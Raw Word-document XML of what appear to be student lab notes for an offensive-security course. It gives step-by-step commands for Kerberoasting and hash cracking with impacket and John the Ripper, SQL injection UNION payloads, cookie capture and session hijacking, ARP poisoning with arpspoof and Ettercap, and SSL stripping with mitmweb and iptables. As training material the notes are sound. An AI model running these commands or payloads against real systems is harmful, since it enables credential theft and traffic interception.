    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3228746D" w14:textId="1B11356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/usr/bin/gvm-feed-update”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="52FB1F53" w14:textId="069A1711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Start OpenVAS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="231BB7E8" w14:textId="128831B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“sudo gvm-start”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="757308ED" w14:textId="77ACF14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command prompt, type “cat /usr/bin/gvm-feed-update”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0D631E98" w14:textId="2BA4C0B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Downloads updates for NVT, GVMD_DATA, SCAP, and CERT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="462DC5DA" w14:textId="6099DB03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6 – Different Types of Network Attack Tools</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="486D7A25" w14:textId="6F0CFF8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In Services, start MSSQLSERVER</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5F124D4F" w14:textId="4078688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Explore the database and find the Employees table.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="04E85D6E" w14:textId="2698A16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Listed in the table are the Employees names and salaries.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="50B004F1" w14:textId="7BD551D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Go to Event Viewer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4C571F99" w14:textId="7BE514A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Expand Windows Logs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="30AB1D92" w14:textId="490FFC4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Search through the Security Logs, refresh it for current updates.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="32AE1A79" w14:textId="293726FF">
      <w:pPr>
        <w:spacing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13FD5C35" w14:textId="399F2FB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Prepare for a Silver-Ticket Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1DFD833F" w14:textId="1939FBA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Kali_Linux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In command prompt, type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="068BCDC4" w14:textId="4E7117F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“impacket-GetUserSPNs -dc-ip 192.168.0.1 ‘websiteURL’/aimer:’enter the password’”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="42B23A06" w14:textId="303EBE6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“-request” after the above command to get the NTLM hash.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3E15FD3F" w14:textId="53D6EBA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next put the NTLM hash in a file through the terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0F0278F0" w14:textId="6BD33BD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 “nano kerb_hash”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7AA2F1FC" w14:textId="2E574C4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Kali_Linux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crack the NTLM hash with John the Ripper against the rockyou wordlist.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2FC918B9" w14:textId="3E18F7E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“john - -wordlist=/usr/share/wordlists/rockyou.txt ‘whatever file the hash is in’”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="16731D14" w14:textId="3351E744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4EF3B9E8" w14:textId="16395FE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Find the Domain SID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1A2CC84B" w14:textId="7E7AFF2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type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3C9589A3" w14:textId="4BD8DCA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“python3~/impacket/examples/lookupsid.py {websiteURL}/aimar:{password}@{IPaddress}”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="61075349" w14:textId="086F0457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5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="10DE4088" w14:textId="13716E5C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465789E5" w14:textId="6E68B9A0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32474C0" w14:textId="18DD63E7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32B984A4" w14:textId="6D647CB2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6DC441BE" w14:textId="5C4B0490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3B69B94" w14:textId="155BE8F5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49D0FE19" w14:textId="792ECC4F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44A65C29" w14:textId="5E1E5A46">
      <w:pPr>
        <w:pStyle w:val="Normal"/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A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0AE75DE5" w14:textId="4AC17E01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7 – Application Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="40FAFA38" w14:textId="0E496071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Brute-Force Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="23DC3AA0" w14:textId="2C55E3F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Go to XAMPP Control Panel</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="422973D7" w14:textId="29DD0FE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Start up Apache and SQL Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="25BC41F8" w14:textId="044D1F9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: Start Burp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="70E87875" w14:textId="24B10A1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Toggle Proxy to On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="668266FC" w14:textId="3E98856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Toggle the FoxyProxy in Firefox and enter default username and password in web application.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3F281695" w14:textId="35A8303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 username and password should pass to Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3B925D0F" w14:textId="19F1506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Copy the cookie info.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="47B67A7E" w14:textId="480EE3B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terminal, type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="26FC660C" w:rsidP="0C5E9F89" w:rsidRDefault="26FC660C" w14:paraId="42ABCED3" w14:textId="471F299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/>
      </w:pPr>
      <w:r w:rsidR="26FC660C">
        <w:drawing>
          <wp:inline wp14:editId="1C0AC146" wp14:anchorId="4176E120">
            <wp:extent cx="4572000" cy="2724150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122904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0b422def5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4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="41FA8FDC" w14:textId="14DEB764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SQL Injection Attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="08E3E764" w14:textId="3446DDA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SQL Injection syntax</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0E19C702" w14:textId="5706673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</w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="468EAA62" w14:textId="424B9CA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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4FFCAC76" w14:textId="00973C5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 or ‘1’ = ‘1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6E6B0274" w14:textId="3805630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 UNION SELECT NULL’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="42CC0688" w14:textId="4818B99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‘ UNION SELECT NULL, NULL’ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2AAE90B7" w14:textId="6546C2A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 UNION SELECT USER(), VERSION()’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="238D93D0" w14:textId="5368FEE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 UNION SELECT NULL, table_name FROM information_schema.tables—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7CE7C728" w14:textId="109FB6B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 UNION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NULL, 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table_name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information_schema.tables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WHERE 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table_name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‘user%’—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="5ED0CC28" w14:textId="48CD410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5A5870DF" w14:textId="5F7E528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1C62DF06" w14:textId="6A0BE89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AFA9556" w14:textId="37908BF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17D0950" w14:textId="7B1E39D3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01E2A97" w14:textId="28DA9B7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A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="725EB127" w14:textId="25CAC31B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8 – Exploiting Application Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2AB435DF" w14:textId="31652BB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Capturing a Victim’s Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="19E01EFD" w14:textId="072065F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Wireshark on Kali Linux and apply a filter.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4B1F1AF8" w14:textId="22BCC45F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Ip.dst==”____” with the victim’s IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="24E9D670" w14:textId="73EB010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Look for a GET request in the Info tab in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5565AF04" w14:textId="1A61D512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Under the Hypertext Transfer Protocol find the cookie and store it to a file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="427B8ECE" w14:textId="7C095DB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Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7B355EA6" w14:textId="5BE5B41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On a separate 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machine, access the website and before logging in, go to the DevTools.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="319489CF" w14:textId="16F7515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More Tabs/Applications/Storage/Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2BE65750" w14:textId="259B1D5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IP address in the Cookies Tab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="21C64644" w14:textId="38D49BB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PHPSESSID – Value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2E1BB78C" w14:textId="33217C7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Replace it with the cookie from the Wireshark on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0594A7B1" w14:textId="1745583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Removing Cookies </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3E3E80AD" w14:textId="3AB6323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On the top right on the webpage, click on the three dots/Settings.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5A896A42" w14:textId="46D0C2A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Cookies/Manage and delete cookies and site data/See all cookies and site data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="02F8095B" w14:textId="07E38A3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Click Remove All</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="421A1B54" w14:textId="4BD8EE5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Capture User’s Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="27FF7F05" w14:textId="5B4CF2D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Do the above method but instead on removing cookies, click on the only options there since you previously removed all cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4EF37C66" w14:textId="61FF380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Send it to the shared Kali-Windows file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2FE17F33" w14:textId="251AD0A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Intercept Victim Connection and Insert Attacker’s Cookie</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="02381B78" w14:textId="185DC6D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Kali, start Burp.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="790D73BE" w14:textId="2D5D5AA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Proxy/Options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="33BB5895" w14:textId="2571750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Intercept Server Responses, select the Intercept responses based on the following rules and check off the Or-Request-Was intercepted.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="044BED08" w14:textId="55F7D1C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Firefox and clear your cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1C379A46" w14:textId="171DD10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Start FoxyProxy.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0831C09C" w14:textId="50FBAB7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Firefox and enter the website’s name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6FB4D7BC" w14:textId="6571927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Burp should open with the HTML, and we are looking for the cookie tab.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="01B85094" w14:textId="1EF3DE4F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is modifiable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7B6876EE" w14:textId="3D8EF9A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modifiable cookie field, enter the cookie we got from the Windows machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="45467EEA" w14:textId="2D0C649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Turn off FoxyProxy and entered the website’s name into Firefox.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="41D734DD" w14:textId="40B2CD19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At the URL, replace “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login.php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” with “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index.php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0C5E9F89" w:rsidP="0C5E9F89" w:rsidRDefault="0C5E9F89" w14:paraId="67B6694B" w14:textId="3BBE4FA7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4B892E52" w14:textId="4646702B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30A13685" w14:textId="7B8AB345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799CCA46" w14:textId="62666CC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642ACD03" w14:textId="251FA6B1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509951F8" w14:textId="52CD28FE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578B3830" w14:textId="6022ACC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036A76DC" w14:textId="12DCA1C5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5A57080C" w14:textId="160CE18F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29FFA50D" w14:textId="69C78A7C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A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2FAEBEF7" w14:textId="4C82822A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9 – On-Path Network Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7251C3FF" w14:textId="34369F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the command prompt and enter, “ipconfig /all”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4DA88FE8" w14:textId="75418A9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Observe the MAC and Ipv4 addresses since they will be needed in this section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0050CCB6" w14:textId="354756A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 “arp -a” to display the ARP cache.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0A8A9E1C" w14:textId="36E24A8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boot up Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="02E0BF83" w14:textId="09E6540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the specific site(varies) and login(depends)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="231B1F4A" w14:textId="1009546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Stop Wireshark and apply a filter “arp”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="474E2122" w14:textId="06532E3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Windows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Apply a filter “http”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5CD7376B" w14:textId="5106239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You can also apply another filter for a specific request like</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="117B4154" w14:textId="2FC8D587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‘http.request.method == “POST”’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="07F5AEAD" w14:textId="418EB2F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Expand the ‘HTML Form URL Encoded’ Section</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="10483098" w14:textId="5A57B49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Down below should be the username and password if you logged in during the packet capturing and the site is unsecure (HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="24B3F91C" w14:textId="717EAB9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HOWEVER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, this all worked since it was done on the same machine. If you would like to find info on a different machine, you need to use arp poisoning.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="56C028D3" w14:textId="37E1A08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ARP Poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="23D1A26F" w14:textId="4CD172A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“sudo netdiscover”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="71CBF132" w14:textId="70E0ACF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“cat /proc/sys/net/ipv4/ip_forward”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="4A5F32AD" w14:textId="7C87C34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If it returns a 0, that means that IP forwarding is not enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="1F0F17DA" w14:textId="0AB8F60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“sudo -i”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="7E2DBD86" w14:textId="325E9D6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That goes into root privileges in Kali terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="179D7262" w14:textId="10C204B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1A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="01489642" w14:textId="4514E2C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“echo 1 &gt; /proc/sys/net/ipv4/ip_forward”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="46558B54" w14:textId="3C47ECB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IP Forwarding should be enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="25CD5DA5" w14:textId="6DEA79E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“arpspoof -h”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="40003859" w14:textId="78F59F1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Opens the arpspoof help.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="774F4577" w14:textId="2DFD94F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“arpspoof -I eth0 -t {Your IP addr} {Victim’s IP addr}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="25C7C8C6" w14:textId="526FBA5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This is a useful command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="41CC2389" w14:textId="3C6F1A2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“ip.src=={IP Source} and http”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="75B1F107" w14:textId="76A8C6F9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SSL/TLS Downgrading</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2BB02309" w14:textId="2DD0D28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Launch Ettercap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="00A95362" w14:textId="665C33B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Press magnifying glass icon to Scan for hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3556C454" w14:textId="0267F2E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Press the server stack icon to view the Hosts List</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="0101EFB7" w14:textId="4134B05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Victim and set them as Target 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="56EA8CD2" w14:textId="2BC2B95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Default Gateway to Target 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="44DC74C3" w14:textId="731BD6E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MITM menu/ Select ARP poisoning / Select Go</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="11BD4651" w14:textId="7D25B52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Conduct SSL Stripping</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6B3008C0" w14:textId="70D9D2B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 “sudo -i”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="04D84F39" w14:textId="1A3ED51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 “locate sslstrip”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="72BD95EC" w14:textId="59EE9D1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terminal, type </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="42B6AC36" w14:textId="5B074F82">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="257" w:lineRule="auto"/>
        <w:jc w:val="both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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“mitmweb -s /usr/share/doc/mitproxy/examples/contrib/sslstrip.py -m transparent”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="718D0A6F" w14:textId="6CC6E73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a new terminal, type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="6D4CC783" w14:textId="19F2520A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“sudo iptables -t nat -L PREROUTING”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="695E90C0" w14:textId="1A79C7A7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 PREROUTING chain is used for Network Address Translation(NAT) to forward packets between the ARP poisoned client and server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="634DCE03" w14:textId="48B04DC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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5077E2B6" w14:textId="4AE87F86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“sudo iptables -t nat -A PREROUTING -p tcp - -destination-port 80 -j REDIRECT - -to-ports 8080”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="2551210B" w14:textId="7D7D232A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An HTTP connection on port 80 will be forwarded to port 8080, where the sslstrip proxy server is listening</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="5D309088" w14:textId="5EF5A41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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="71C72F5B" w14:textId="63ED2B5D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“sudo iptables -t nat -L PREROUTING”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="11A4D87F" w:rsidP="0C5E9F89" w:rsidRDefault="11A4D87F" w14:paraId="3E9EC2CE" w14:textId="125088B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</w:t>
      </w:r>
    </w:p>
